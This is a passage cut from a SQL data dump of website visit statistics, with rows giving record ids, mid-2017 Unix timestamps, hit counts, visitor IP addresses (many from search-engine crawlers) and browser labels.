.132.97','other'),(116653,1496277796,1,0,1,0,'68.180.230.48',''),(116654,1496277812,1,1,0,0,'51.255.65.10','other'),(116655,1496278123,1,1,0,0,'51.255.65.86','other'),(116656,1496279481,1,0,1,0,'66.249.64.153',''),(116657,1496279653,1,1,0,0,'164.132.161.8','other'),(116658,1496279659,1,1,0,0,'180.76.15.139','other'),(116659,1496279934,1,1,0,0,'8.29.198.25','other'),(116660,1496279962,1,1,0,0,'164.132.161.39','other'),(116661,1496280010,1,1,0,0,'164.132.161.57','other'),(116662,1496280390,1,1,0,0,'157.55.39.35','other'),(116663,1496280712,1,1,0,0,'164.132.161.11','other'),(116664,1496281044,1,1,0,0,'51.255.71.127','other'),(116665,1496281666,1,1,0,0,'164.132.161.39','other'),(116666,1496282002,1,1,0,0,'51.255.65.29','other'),(116667,1496282279,1,1,0,0,'51.255.65.75','other'),(116668,1496282407,1,1,0,0,'164.132.161.47','other'),(116669,1496282482,1,1,0,0,'217.182.132.59','other'),(116670,1496282742,1,1,0,0,'51.255.65.63','other'),(116671,1496282906,2,0,2,0,'66.249.64.155',''),(116672,1496283043,1,1,0,0,'66.249.64.28','chrome'),(116673,1496283053,1,1,0,0,'66.249.64.29','chrome'),(116674,1496283690,1,1,0,0,'164.132.161.59','other'),(116675,1496283791,1,1,0,0,'164.132.161.97','other'),(116676,1496283921,2,0,2,0,'66.249.64.155',''),(116677,1496284557,1,1,0,0,'164.132.161.69','other'),(116678,1496284748,1,1,0,0,'164.132.162.187','other'),(116679,1496284892,1,1,0,0,'217.182.132.150','other'),(116680,1496285136,1,1,0,0,'157.55.39.35','other'),(116681,1496285221,1,1,0,0,'46.211.100.210','chrome'),(116682,1496285364,1,1,0,0,'178.92.251.49','chrome'),(116683,1496285923,3,3,0,0,'51.255.173.13','other'),(116684,1496285999,1,0,1,0,'66.249.64.157',''),(116685,1496286582,2,1,1,0,'66.249.64.30',''),(116686,1496286766,1,1,0,0,'51.255.65.63','other'),(116687,1496287118,1,1,0,0,'217.182.132.92','other'),(116688,1496287139,2,0,2,0,'66.249.64.153',''),(116689,1496287164,1,1,0,0,'157.55.39.35','other'),(116690,1496287195,1,1,0,0,'157.55.39.189','other'),(116691,1496287670,1,0,1,0,'66.249.64.157',''),(116692,1496288152,1,1,0,0,'217.182.132.20','other'),(116693,1496288734,1,0,1,0,'66.249.64.153',''),(116694,1496288747,1,0,1,0,'66.249.64.30',''),(116695,1496288859,1,1,0,0,'217.182.132.66','other'),(116696,1496288870,1,1,0,0,'217.182.132.187','other'),(116697,1496289509,1,1,0,0,'109.192.228.149','chrome'),(116698,1496289733,1,1,0,0,'51.255.65.29','other'),(116699,1496290473,1,1,0,0,'164.132.161.56','other'),(116700,1496290489,1,0,1,0,'66.249.64.157',''),(116701,1496290762,1,1,0,0,'8.29.198.26','other'),(116702,1496291084,1,1,0,0,'66.249.64.28','chrome'),(116703,1496292108,1,1,0,0,'164.132.162.188','other'),(116704,1496292245,1,1,0,0,'217.182.132.95','other'),(116705,1496293099,1,1,0,0,'91.196.178.68','firefox'),(116706,1496293262,1,1,0,0,'164.132.161.21','other'),(116707,1496293272,1,0,1,0,'66.249.64.28',''),(116708,1496293294,1,0,1,0,'66.249.64.153',''),(116709,1496293542,1,1,0,0,'207.46.13.118','other'),(116710,1496293571,1,1,0,0,'164.132.161.83','other'),(116711,1496293728,1,1,0,0,'180.76.15.32','other'),(116712,1496294063,1,1,0,0,'217.182.132.50','other'),(116713,1496294286,1,1,0,0,'40.77.167.85','other'),(116714,1496294580,1,1,0,0,'51.255.65.8','other'),(116715,1496294600,1,1,0,0,'164.132.161.97','other'),(116716,1496294692,1,0,1,0,'66.249.64.29',''),(116717,1496294781,1,0,1,0,'66.249.64.153',''),(116718,1496294813,1,1,0,0,'66.249.64.29','chrome'),(116719,1496294995,1,1,0,0,'164.132.161.19','other'),(116720,1496295095,1,1,0,0,'95.132.29.182','firefox'),(116721,1496295131,1,1,0,0,'51.255.65.37','other'),(116722,1496295387,1,1,0,0,'217.182.132.20','other'),(116723,1496295754,1,0,1,0,'66.249.64.155',''),(116724,1496295997,1,1,0,0,'207.46.13.118','other'),(116725,1496296105,1,0,1,0,'68.180.230.48',''),(116726,1496296902,2,2,0,0,'91.196.178.70','firefox'),(116727,1496297318,2,2,0,0,'91.196.177.17','chrome'),(116728,1496298240,1,1,0,0,'51.255.65.224','other'),(116729,1496298533,1,1,0,0,'217.182.132.155','other'),(116730,1496298582,1,1,0,0,'217.182.132.17','other'),(116731,1496298762,1,1,0,0,'164.132.161.46','other'),(116732,1496298977,1,0,1,0,'66.249.64.155',''),(116733,1496299553,1,1,0,0,'51.255.71.113','other'),(116734,1496299635,1,1,0,0,'91.196.178.68','chrome'),(116735,1496299849,1,1,0,0,'66.249.64.29','chrome'),(116736,1496300151,1,1,0,0,'217.182.132.175','other'),(116737,1496300187,1,1,0,0,'164.132.161.13','other'),(116738,1496300323,1,1,0,0,'91.196.177.46','chrome'),(116739,1496300691,1,1,0,0,'185.182.81.36','chrome'),(116740,1496300880,1,1,0,0,'217.182.132.78','other'),(116741,1496301113,1,1,0,0,'180.76.15.31','other'),(116742,1496301194,1,1,0,0,'51.255.65.54','other'),(116743,1496301586,1,1,0,0,'8.29.198.27','other'),(116744,1496301592,1,1,0,0,'91.196.178.68','chrome'),(116745,1496301625,1,1,0,0,'91.196.178.68','firefox'),(116746,1496301780,1,1,0,0,'91.196.178.164','chrome'),(116747,1496302056,1,1,0,0,'217.182.132.151','other'),(116748,1496302072,1,0,1,0,'66.249.64.29',''),(116749,1496302077,1,0,1,0,'66.249.64.155',''),(116750,1496302366,1,1,0,0,'164.132.161.41','other'),(116751,1496302517,1,1,0,0,'91.196.178.68','chrome'),(116752,1496302532,1,1,0,0,'66.102.9.25','chrome'),(116753,1496302757,1,1,0,0,'51.255.65.4','other'),(116754,1496303098,1,1,0,0,'51.255.71.129','other'),(116755,1496303518,1,1,0,0,'185.76.10.164','chrome'),(116756,1496303799,1,1,0,0,'217.182.132.29','other'),(116757,1496303840,1,1,0,0,'217.182.132.91','other'),(116758,1496303907,1,1,0,0,'91.196.178.66','firefox'),(116759,1496304283,1,1,0,0,'91.196.178.68','chrome'),(116760,1496304313,1,1,0,0,'217.182.132.74','other'),(116761,1496304393,1,1,0,0,'37.53.230.240','chrome'),(116762,1496304433,1,1,0,0,'91.196.178.69','firefox'),(116763,1496304525,1,1,0,0,'217.182.132.64','other'),(116764,1496304925,1,0,1,0,'66.249.64.30',''),(116765,1496305134,1,1,0,0,'91.196.177.15','chrome'),(116766,1496305407,1,1,0,0,'91.196.178.68','chrome'),(116767,1496305952,1,1,0,0,'217.182.132.68','other'),(116768,1496306120,1,1,0,0,'51.255.65.24','other'),(116769,1496306189,1,1,0,0,'91.196.177.46','firefox'),(116770,1496306245,1,1,0,0,'51.255.65.7','other'),(116771,1496306540,2,2,0,0,'91.196.177.44','chrome'),(116772,1496306967,1,1,0,0,'195.22.111.146','firefox'),(116773,1496307050,1,0,1,0,'68.180.230.48',''),(116774,1496307116,1,1,0,0,'217.182.132.32','other'),(116775,1496307133,1,1,0,0,'51.255.65.97','other'),(116776,1496307309,1,1,0,0,'164.132.161.82','other'),(116777,1496307319,1,1,0,0,'164.132.162.164','other'),(116778,1496307471,1,1,0,0,'217.182.132.7','other'),(116779,1496307671,30,30,0,0,'204.12.208.10','other'),(116780,1496307716,1,0,1,0,'66.249.64.153',''),(116781,1496307792,3,3,0,0,'66.249.64.157','chrome'),(116782,1496307872,1,1,0,0,'66.249.64.155','chrome'),(116783,1496307893,1,1,0,0,'66.249.64.30','chrome'),(116784,1496307897,4,4,0,0,'66.249.64.28','chrome'),(116785,1496308087,1,1,0,0,'66.249.64.153','chrome'),(116786,1496308267,1,0,1,0,'66.249.64.29',''),(116787,1496308273,1,1,0,0,'51.255.65.78','other'),(116788,1496308371,1,1,0,0,'164.132.161.6','other'),(116789,1496309114,1,0,1,0,'66.249.64.157',''),(116790,1496309146,1,1,0,0,'51.255.65.77','other'),(116791,1496309210,1,1,0,0,'95.135.53.190','firefox'),(116792,1496309398,1,0,1,0,'66.249.64.28',''),(116793,1496309508,1,1,0,0,'91.196.178.68','chrome'),(116794,1496309713,1,1,0,0,'91.196.178.68','firefox'),(116795,1496309913,1,1,0,0,'51.255.65.38','other'),(116796,1496309914,1,1,0,0,'164.132.162.154','other'),(116797,1496310122,2,2,0,0,'95.132.29.182','firefox'),(116798,1496310271,1,1,0,0,'92.112.109.230','chrome'),(116799,1496310349,1,1,0,0,'51.255.65.12','other'),(116800,1496310746,1,1,0,0,'91.196.177.46','firefox'),(116801,1496311174,1,0,1,0,'66.249.64.28',''),(116803,1496311206,1,0,1,0,'66.249.64.155',''),(116804,1496311219,1,1,0,0,'51.255.65.5','other'),(116805,1496311558,1,0,1,0,'66.249.64.153',''),(116806,1496311743,1,1,0,0,'91.196.178.67','chrome'),(116807,1496312001,1,1,0,0,'217.182.132.28','other'),(116808,1496312416,1,1,0,0,'8.29.198.25','other'),(116809,1496312509,2,2,0,0,'91.196.178.166','chrome'),(116810,1496312797,1,1,0,0,'157.55.39.202','other'),(116811,1496313267,1,1,0,0,'164.132.161.17','other'),(116812,1496313284,1,1,0,0,'164.132.161.39','other'),(116813,1496313572,1,1,0,0,'217.182.132.63','other'),(116814,1496313760,1,1,0,0,'217.182.132.148','other'),(116815,1496314121,1,1,0,0,'193.164.95.197','other'),(116816,1496314245,1,1,0,0,'164.132.161.16','other'),(116817,1496314392,1,1,0,0,'109.173.125.248','firefox'),(116818,1496314909,2,2,0,0,'54.165.59.7','other'),(116819,1496314934,1,1,0,0,'91.196.178.166','chrome'),(116820,1496315046,1,1,0,0,'51.255.71.133','other'),(116821,1496315137,1,1,0,0,'217.182.132.71','other'),(116822,1496315425,1,1,0,0,'217.182.132.77','other'),(116823,1496315525,1,0,1,0,'66.249.64.153',''),(116824,1496315942,1,1,0,0,'51.255.65.46','other'),(116825,1496316467,1,1,0,0,'51.255.65.25','other'),(116826,1496316496,1,1,0,0,'51.255.65.82','other'),(116827,1496316536,1,1,0,0,'164.132.161.47','other'),(116828,1496316578,2,2,0,0,'54.165.59.7','other'),(116829,1496316733,1,1,0,0,'217.182.132.59','other'),(116830,1496316773,2,2,0,0,'46.133.134.194','other'),(116831,1496316831,1,1,0,0,'51.255.71.113','other'),(116832,1496317183,1,1,0,0,'217.182.132.153','other'),(116833,1496317188,1,1,0,0,'91.196.178.70','firefox'),(116834,1496317359,1,0,1,0,'68.180.230.48',''),(116835,1496317366,1,1,0,0,'217.182.132.180','other'),(116836,1496317538,1,1,0,0,'217.182.132.73','other'),(116837,1496317655,1,1,0,0,'217.182.132.95','other'),(116838,1496318058,2,0,2,0,'66.249.64.28',''),(116839,1496318145,1,1,0,0,'164.132.161.85','other'),(116840,1496318609,1,1,0,0,'51.255.65.88','other'),(116841,1496318613,1,1,0,0,'176.15.28.246','msie'),(116842,1496318620,1,1,0,0,'66.249.64.29','chrome'),(116843,1496318990,1,1,0,0,'217.182.132.54','other'),(116844,1496319215,1,1,0,0,'91.124.39.53','chrome'),(116845,1496319374,1,1,0,0,'137.74.207.110','other'),(116846,1496319404,1,0,1,0,'66.249.64.30',''),(116847,1496319410,2,0,2,0,'66.249.64.153',''),(116848,1496319428,1,1,0,0,'91.196.178.68','chrome'),(116849,1496319645,1,1,0,0,'37.204.43.143','chrome'),(116850,1496319737,1,1,0,0,'217.182.132.20','other'),(116851,1496319779,1,1,0,0,'46.219.2.9','chrome'),(116852,1496319817,1,1,0,0,'217.182.132.149','other'),(116853,1496319948,1,1,0,0,'91.196.178.164','chrome'),(116854,1496320058,1,1,0,0,'217.182.132.87','other'),(116855,1496320395,1,1,0,0,'217.182.132.59','other'),(116856,1496320426,1,1,0,0,'91.196.178.68','chrome'),(116857,1496320719,1,1,0,0,'217.182.132.19','other'),(116858,1496321065,2,2,0,0,'157.55.39.60','other'),(116859,1496321409,1,1,0,0,'91.196.178.68','chrome'),(116860,1496321754,1,1,0,0,'51.255.71.128','other'),(116861,1496322510,1,1,0,0,'217.182.132.84','other'),(116862,1496322639,1,0,1,0,'66.249.64.155',''),(116863,1496322644,1,1,0,0,'217.182.132.82','other'),(116864,1496322705,1,1,0,0,'51.255.65.78','other'),(116865,1496323245,1,1,0,0,'8.29.198.26','other'),(116866,1496323699,2,2,0,0,'95.132.29.182','firefox'),(116867,1496323851,1,1,0,0,'195.49.151.89','chrome'),(116868,1496324327,1,1,0,0,'178.251.111.188','chrome'),(116869,1496324483,1,1,0,0,'92.112.109.230','chrome'),(116870,1496324484,1,1,0,0,'51.255.65.91','other'),(116871,1496324800,1,1,0,0,'95.132.29.182','firefox'),(116872,1496324810,1,1,0,0,'217.182.132.20','other'),(116873,1496325185,1,0,1,0,'66.249.64.30',''),(116874,1496325218,1,0,1,0,'66.249.64.155',''),(116875,1496325471,1,1,0,0,'109.236.81.168','chrome'),(116876,1496325528,1,1,0,0,'51.255.65.60','other'),(116877,1496325734,1,1,0,0,'51.255.71.129','other'),(116878,1496325810,1,1,0,0,'95.132.29.182','firefox'),(116879,1496326812,1,0,1,0,'66.249.64.153',''),(116880,1496327162,1,1,0,0,'164.132.161.40','other'),(116881,1496327275,1,1,0,0,'51.255.65.42','other'),(116882,1496327384,1,0,1,0,'68.180.230.48',''),(116883,1496327819,1,1,0,0,'164.132.161.34','other'),(116884,1496328107,1,1,0,0,'164.132.161.7','other'),(116885,1496328125,1,1,0,0,'164.132.162.158','other'),(116886,1496328419,1,1,0,0,'51.255.65.61','other'),(116887,1496328589,1,1,0,0,'164.132.161.83','other'),(116888,1496328724,1,1,0,0,'164.132.161.3','other'),(116889,1496329046,1,1,0,0,'51.255.65.36','other'),(116890,1496329204,1,0,1,0,'66.249.66.201',''),(116891,1496329238,1,1,0,0,'82.207.91.234','firefox'),(116892,1496329333,1,1,0,0,'51.255.71.117','other'),(116893,1496329401,1,0,1,0,'66.249.76.109',''),(116894,1496329525,1,0,1,0,'66.249.76.107',''),(116895,1496329536,1,0,1,0,'66.249.66.157',''),(116896,1496329601,1,1,0,0,'66.249.76.93','chrome'),(116897,1496330032,1,1,0,0,'78.111.190.120','chrome'),(116898,1496330356,1,1,0,0,'164.132.161.53','other'),(116899,1496330749,1,1,0,0,'51.255.65.73','other'),(116900,1496330869,1,1,0,0,'51.255.65.4','other'),(116901,1496331088,1,1,0,0,'217.182.132.15','other'),(116902,1496331583,1,1,0,0,'164.132.161.23','other'),(116903,1496331795,1,0,1,0,'68.180.230.48',''),(116904,1496331941,1,0,1,0,'66.249.76.107',''),(116905,1496332468,1,1,0,0,'151.80.27.118','other'),(116906,1496332715,1,1,0,0,'109.173.60.215','msie'),(116907,1496332716,1,1,0,0,'95.221.242.150','msie'),(116908,1496332729,1,1,0,0,'194.44.115.15','chrome'),(116909,1496332915,1,1,0,0,'91.196.178.40','chrome'),(116910,1496333294,1,0,1,0,'66.249.66.156',''),(116911,1496333764,1,1,0,0,'164.132.161.82','other'),(116912,1496333891,1,0,1,0,'66.249.66.157',''),(116913,1496333992,1,1,0,0,'66.249.76.108','chrome'),(116914,1496334072,1,1,0,0,'8.29.198.25','other'),(116915,1496334127,1,1,0,0,'157.55.39.60','other'),(116916,1496334597,1,1,0,0,'51.255.64.106','other'),(116917,1496334619,1,1,0,0,'137.74.207.110','other'),(116918,1496334854,1,1,0,0,'51.255.65.51','other'),(116919,1496335475,1,0,1,0,'66.249.76.93',''),(116920,1496336304,1,1,0,0,'51.255.71.120','other'),(116921,1496336484,1,0,1,0,'68.180.230.48',''),(116922,1496336527,1,1,0,0,'180.76.15.8','other'),(116923,1496336855,1,1,0,0,'176.101.202.220','chrome'),(116924,1496337077,1,1,0,0,'51.255.71.123','other'),(116925,1496337232,1,1,0,0,'157.55.39.202','other'),(116926,1496337982,1,0,1,0,'66.249.66.213',''),(116927,1496338007,1,0,1,0,'66.249.76.93',''),(116928,1496338203,1,1,0,0,'164.132.161.87','other'),(116929,1496338303,1,1,0,0,'176.31.231.10','other'),(116930,1496338520,1,1,0,0,'141.8.183.1','other'),(116931,1496338528,1,1,0,0,'87.250.224.18','other'),(116932,1496338595,1,1,0,0,'164.132.161.17','other'),(116933,1496338955,1,1,0,0,'217.182.132.68','other'),(116934,1496339438,1,1,0,0,'164.132.161.47','other'),(116935,1496339682,1,1,0,0,'217.23.11.71','chrome'),(116936,1496339836,1,1,0,0,'66.249.66.156','chrome'),(116937,1496339883,1,1,0,0,'51.255.65.15','other'),(116938,1496339924,2,0,2,0,'66.249.66.201',''),(116939,1496339935,1,0,1,0,'66.249.76.107',''),(116940,1496339943,1,0,1,0,'66.249.76.109',''),(116941,1496339947,1,0,1,0,'66.249.76.108',''),(116942,1496340409,1,1,0,0,'157.55.39.169','other'),(116943,1496340853,3,0,3,0,'66.249.76.89',''),(116944,1496340859,1,1,0,0,'164.132.161.38','other'),(116945,1496340958,1,1,0,0,'91.196.178.162','chrome'),(116946,1496341351,1,1,0,0,'51.255.65.32','other'),(116947,1496341674,1,0,1,0,'66.249.66.199',''),(116948,1496341901,1,1,0,0,'157.55.39.202','other'),(116949,1496342009,1,1,0,0,'92.112.248.126','chrome'),(116950,1496342022,1,1,0,0,'51.255.65.31','other'),(116951,1496342526,1,0,1,0,'66.249.76.107',''),(116952,1496342571,1,0,1,0,'66.249.66.195',''),(116953,1496342780,1,1,0,0,'51.255.71.121','other'),(116954,1496342838,1,1,0,0,'157.55.39.169','other'),(116955,1496342946,1,1,0,0,'51.255.65.20','other'),(116956,1496343080,1,1,0,0,'164.132.161.58','other'),(116957,1496344920,1,1,0,0,'8.29.198.25','other'),(116958,1496345186,1,1,0,0,'51.255.71.121','other'),(116959,1496345839,1,1,0,0,'217.182.132.182','other'),(116960,1496346244,1,1,0,0,'217.182.132.151','other'),(116961,1496346453,1,1,0,0,'217.182.132.150','other'),(116962,1496347092,3,3,0,0,'178.154.149.1','other'),(116963,1496347114,1,0,1,0,'68.180.230.48',''),(116964,1496347134,1,1,0,0,'141.8.132.25','other'),(116965,1496347140,1,1,0,0,'141.8.142.38','other'),(116966,1496347147,1,1,0,0,'93.158.152.79','other'),(116967,1496347151,2,2,0,0,'141.8.142.164','other'),(116968,1496347159,1,1,0,0,'95.108.181.13','other'),(116969,1496347163,1,1,0,0,'95.108.213.34','other'),(116970,1496347174,1,1,0,0,'37.9.113.38','other'),(116971,1496347179,3,3,0,0,'95.108.213.8','other'),(116972,1496347183,1,1,0,0,'87.250.224.18','other'),(116973,1496347187,1,1,0,0,'5.255.253.28','other'),(116974,1496347198,1,1,0,0,'87.250.224.16','other'),(116975,1496347214,1,1,0,0,'5.255.253.63','other'),(116976,1496347225,1,1,0,0,'178.154.149.3','other'),(116977,1496347271,1,1,0,0,'66.249.76.89','chrome'),(116978,1496347550,1,1,0,0,'217.182.132.74','other'),(116979,1496347762,1,1,0,0,'217.182.132.61','other'),(116980,1496348090,1,1,0,0,'137.74.207.110','other'),(116981,1496348241,1,0,1,0,'66.249.76.107',''),(116982,1496348378,1,0,1,0,'66.249.76.93',''),(116983,1496348432,1,1,0,0,'51.255.65.224','other'),(116984,1496348478,1,1,0,0,'51.255.65.3','other'),(116985,1496348893,1,1,0,0,'141.8.142.97','other'),(116986,1496348916,1,1,0,0,'178.154.149.1','other'),(116987,1496349195,1,0,1,0,'66.249.66.158',''),(116988,1496349671,1,1,0,0,'51.255.65.63','other'),(116989,1496349768,1,1,0,0,'217.182.132.65','other'),(116990,1496350139,1,1,0,0,'51.255.71.112','other'),(116991,1496350266,1,0,1,0,'66.249.76.107',''),(116992,1496350284,3,3,0,0,'54.165.59.7','other'),(116993,1496350774,1,1,0,0,'217.182.132.18','other'),(116994,1496351075,1,0,1,0,'66.249.76.93',''),(116995,1496351180,1,1,0,0,'164.132.161.7','other'),(116996,1496351247,1,0,1,0,'66.249.76.109',''),(116997,1496351417,1,0,1,0,'68.180.230.48',''),(116998,1496351561,1,1,0,0,'51.255.71.116','other'),(116999,1496351828,1,1,0,0,'164.132.161.56','other'),(117000,1496352436,1,1,0,0,'157.55.39.169','other'),(117001,1496352703,1,1,0,0,'51.255.65.97','other'),(117002,1496352784,3,3,0,0,'5.189.186.226','other'),(117003,1496352835,1,0,1,0,'66.249.76.109',''),(117004,1496353022,1,1,0,0,'137.74.207.102','other'),(117005,1496353186,1,1,0,0,'164.132.162.157','other'),(117006,1496354005,1,1,0,0,'217.182.132.65','other'),(117007,1496354367,1,1,0,0,'54.165.59.7','other'),(117008,1496354590,1,0,1,0,'68.180.230.48',''),(117009,1496354999,1,0,1,0,'66.249.76.91',''),(117010,1496355219,1,1,0,0,'51.255.65.24','other'),(117011,1496355374,1,0,1,0,'66.249.66.158',''),(117012,1496355755,1,1,0,0,'8.29.198.25','other'),(117013,1496357415,1,0,1,0,'66.249.76.91',''),(117014,1496357456,1,1,0,0,'164.132.161.95','other'),(117015,1496357850,1,1,0,0,'217.182.132.84','other'),(117016,1496358031,1,1,0,0,'217.182.132.177','other'),(117017,1496358920,1,1,0,0,'66.249.66.156','chrome'),(117018,1496359066,1,1,0,0,'40.77.167.5','other'),(117019,1496359152,1,1,0,0,'51.255.71.133','other'),(117020,1496359248,1,1,0,0,'66.249.76.108','chrome'),(117021,1496359317,1,1,0,0,'51.255.65.4','other'),(117022,1496359467,1,0,1,0,'66.249.76.109',''),(117023,1496359532,1,1,0,0,'164.132.161.95','other'),(117024,1496359725,1,0,1,0,'66.249.76.107',''),(117025,1496360080,1,1,0,0,'217.182.132.91','other'),(117026,1496360513,1,1,0,0,'217.182.132.63','other'),(117027,1496360634,1,0,1,0,'66.249.76.91',''),(117028,1496360706,1,1,0,0,'66.249.76.109','chrome'),(117029,1496361104,1,0,1,0,'66.249.76.93',''),(117030,1496361708,1,0,1,0,'66.249.66.195',''),(117031,1496361822,1,0,1,0,'68.180.230.48',''),(117032,1496361872,1,1,0,0,'217.182.132.63','other'),(117033,1496362771,1,1,0,0,'157.55.39.169','other'),(117034,1496362921,1,0,1,0,'66.249.76.109',''),(117035,1496363632,1,1,0,0,'162.210.196.129','other'),(117036,1496363655,1,1,0,0,'40.77.167.5','other'),(117037,1496363657,1,0,1,0,'68.180.230.48',''),(117038,1496363892,1,0,1,0,'66.249.76.93',''),(117039,1496364041,2,0,2,0,'66.249.76.107',''),(117040,1496364265,1,0,1,0,'66.249.66.157',''),(117041,1496364654,1,1,0,0,'217.182.132.27','other'),(117042,1496364721,2,2,0,0,'87.250.224.24','other'),(117043,1496364731,4,4,0,0,'5.255.253.43','other'),(117044,1496364743,1,1,0,0,'37.9.113.5','other'),(117045,1496364750,2,2,0,0,'141.8.132.43','other'),(117046,1496364774,2,2,0,0,'141.8.132.72','other'),(117047,1496364777,5,5,0,0,'37.9.113.38','other'),(117048,1496364805,2,2,0,0,'5.255.253.58','other'),(117049,1496364826,2,2,0,0,'5.255.253.70','other'),(117050,1496364841,1,1,0,0,'141.8.142.49','other'),(117051,1496364867,1,1,0,0,'178.154.200.60','other'),(117052,1496364878,3,3,0,0,'5.255.253.28','other'),(117053,1496364901,3,3,0,0,'141.8.142.48','other'),(117054,1496364912,2,2,0,0,'141.8.183.1','other'),(117055,1496364924,1,1,0,0,'5.255.253.31','other'),(117056,1496364934,1,1,0,0,'95.108.179.15','other'),(117057,1496364945,2,2,0,0,'141.8.132.50','other'),(117058,1496364970,3,3,0,0,'178.154.200.64','other'),(117059,1496364979,1,1,0,0,'95.108.179.8','other'),(117060,1496365002,3,3,0,0,'93.158.152.79','other'),(117061,1496365011,3,3,0,0,'93.158.152.77','other'),(117062,1496365031,2,2,0,0,'93.158.152.59','other'),(117063,1496365033,1,1,0,0,'37.9.113.43','other'),(117064,1496365040,3,3,0,0,'178.154.189.21','other'),(117065,1496365102,1,0,1,0,'66.249.76.89',''),(117066,1496365126,2,2,0,0,'87.250.224.18','other'),(117067,1496365132,1,1,0,0,'178.154.189.29','other'),(117068,1496365134,1,1,0,0,'178.154.200.45','other'),(117069,1496365175,1,1,0,0,'87.250.224.7','other'),(117070,1496365185,2,2,0,0,'87.250.224.8','other'),(117071,1496365231,1,1,0,0,'5.255.253.63','other'),(117072,1496365235,1,1,0,0,'87.250.224.4','other'),(117073,1496365649,1,1,0,0,'51.255.71.127','other'),(117074,1496366616,1,1,0,0,'8.29.198.27','other'),(117075,1496367188,1,1,0,0,'66.249.76.109','chrome'),(117076,1496367315,1,0,1,0,'66.249.66.201',''),(117077,1496367580,1,1,0,0,'141.8.142.97','other'),(117078,1496367864,1,0,1,0,'66.249.76.89',''),(117079,1496367901,1,0,1,0,'66.249.76.93',''),(117080,1496368797,1,0,1,0,'66.249.76.107',''),(117081,1496368897,1,1,0,0,'164.132.161.97','other'),(117082,1496369438,1,1,0,0,'51.255.65.68','other'),(117083,1496369834,3,0,3,0,'66.249.76.108',''),(117084,1496370131,1,1,0,0,'51.255.65.51','other'),(117085,1496370356,1,1,0,0,'51.255.65.71','other'),(117086,1496370427,1,1,0,0,'164.132.161.8','other'),(117087,1496370428,1,1,0,0,'66.249.76.107','chrome'),(117088,1496370481,1,1,0,0,'164.132.161.85','other'),(117089,1496370745,1,1,0,0,'217.182.132.19','other'),(117090,1496370819,1,1,0,0,'157.55.39.120','other'),(117091,1496371262,1,1,0,0,'217.182.132.147','other'),(117092,1496371536,2,2,0,0,'66.249.76.108','chrome'),(117093,1496371542,1,0,1,0,'66.249.76.93',''),(117094,1496371715,1,0,1,0,'66.249.76.109',''),(117095,1496371774,1,1,0,0,'66.249.76.109','chrome'),(117096,1496371832,1,1,0,0,'217.182.132.6','other'),(117097,1496372541,1,1,0,0,'46.188.107.211','msie'),(117098,1496372729,1,0,1,0,'66.249.76.108',''),(117099,1496373721,1,0,1,0,'66.249.76.93',''),(117100,1496373741,1,0,1,0,'66.249.66.157',''),(117101,1496374357,1,0,1,0,'66.249.76.107',''),(117102,1496374414,1,1,0,0,'217.182.132.56','other'),(117103,1496374741,1,1,0,0,'51.255.65.59','other'),(117104,1496374807,1,1,0,0,'164.132.161.21','other'),(117105,1496374989,1,1,0,0,'217.182.132.172','other'),(117106,1496375209,1,0,1,0,'66.249.76.109',''),(117107,1496375255,1,1,0,0,'217.182.132.33','other'),(117108,1496375373,1,1,0,0,'157.55.39.169','other'),(117109,1496375448,1,0,1,0,'68.180.230.48',''),(117110,1496375649,1,1,0,0,'51.255.65.80','other'),(117111,1496375845,1,1,0,0,'164.132.161.32','other'),(117112,1496376390,1,1,0,0,'95.28.227.114','msie'),(117113,1496376974,1,1,0,0,'217.182.132.70','other'),(117114,1496377479,1,1,0,0,'8.29.198.25','other'),(117115,1496377678,1,1,0,0,'217.182.132.25','other'),(117116,1496377815,1,1,0,0,'157.55.39.120','other'),(117117,1496378113,1,1,0,0,'40.77.167.5','other'),(117118,1496378309,1,1,0,0,'91.196.178.129','chrome'),(117119,1496378312,1,1,0,0,'176.193.109.58','msie'),(117120,1496378457,1,1,0,0,'91.196.178.67','firefox'),(117121,1496378687,1,1,0,0,'66.102.9.134','chrome'),(117122,1496379045,1,1,0,0,'164.132.161.70','other'),(117123,1496379433,1,0,1,0,'66.249.76.93',''),(117124,1496380048,1,0,1,0,'66.249.66.199',''),(117125,1496380139,1,1,0,0,'164.132.161.85','other'),(117126,1496380194,1,1,0,0,'217.182.132.53','other'),(117127,1496380586,1,1,0,0,'95.27.44.251','msie'),(117128,1496380818,1,1,0,0,'109.192.228.149','chrome'),(117129,1496380983,1,1,0,0,'51.255.65.72','other'),(117130,1496381190,1,1,0,0,'51.255.65.92','other'),(117131,1496381365,1,1,0,0,'176.193.112.216','msie'),(117132,1496381789,1,1,0,0,'164.132.161.90','other'),(117133,1496381889,1,1,0,0,'137.74.207.116','other'),(117134,1496382192,1,1,0,0,'91.196.178.68','chrome'),(117135,1496382464,1,1,0,0,'128.69.148.63','msie'),(117136,1496382527,1,0,1,0,'66.249.66.158',''),(117137,1496382535,1,0,1,0,'66.249.76.89',''),(117138,1496382786,1,1,0,0,'95.132.23.73','chrome'),(117139,1496382968,1,0,1,0,'66.249.76.107',''),(117140,1496383391,1,1,0,0,'217.182.132.173','other'),(117141,1496383553,1,0,1,0,'66.249.76.108',''),(117142,1496384264,1,1,0,0,'194.44.16.98','chrome'),(117143,1496384542,1,0,1,0,'66.249.76.89',''),(117144,1496384876,1,1,0,0,'217.182.132.69','other'),(117145,1496384900,1,1,0,0,'51.255.65.34','other'),(117146,1496385417,1,1,0,0,'164.132.161.69','other'),(117147,1496386287,1,0,1,0,'66.249.66.158',''),(117148,1496386562,1,1,0,0,'91.196.178.71','chrome'),(117149,1496386634,1,1,0,0,'164.132.162.158','other'),(117150,1496387424,1,1,0,0,'46.164.144.86','chrome'),(117151,1496387514,1,1,0,0,'137.74.207.102','other'),(117152,1496387667,1,1,0,0,'66.249.66.157','chrome'),(117153,1496387827,1,0,1,0,'66.249.76.109',''),(117154,1496387850,1,1,0,0,'217.182.132.37','other'),(117155,1496387994,1,1,0,0,'217.182.132.60','other'),(117156,1496388035,1,0,1,0,'66.249.66.158',''),(117157,1496388070,4,0,4,0,'66.249.76.89',''),(117158,1496388076,1,0,1,0,'66.249.76.91',''),(117159,1496388248,1,1,0,0,'91.196.177.118','chrome'),(117160,1496388288,1,1,0,0,'217.182.132.90','other'),(117161,1496388344,1,1,0,0,'8.29.198.27','other'),(117162,1496388399,1,1,0,0,'66.249.66.199','chrome'),(117163,1496388589,1,1,0,0,'217.182.132.6','other'),(117164,1496388953,1,1,0,0,'51.255.65.42','other'),(117165,1496389019,1,1,0,0,'164.132.161.7','other'),(117166,1496389137,1,0,1,0,'66.249.76.109',''),(117167,1496389276,1,1,0,0,'66.249.83.6','chrome'),(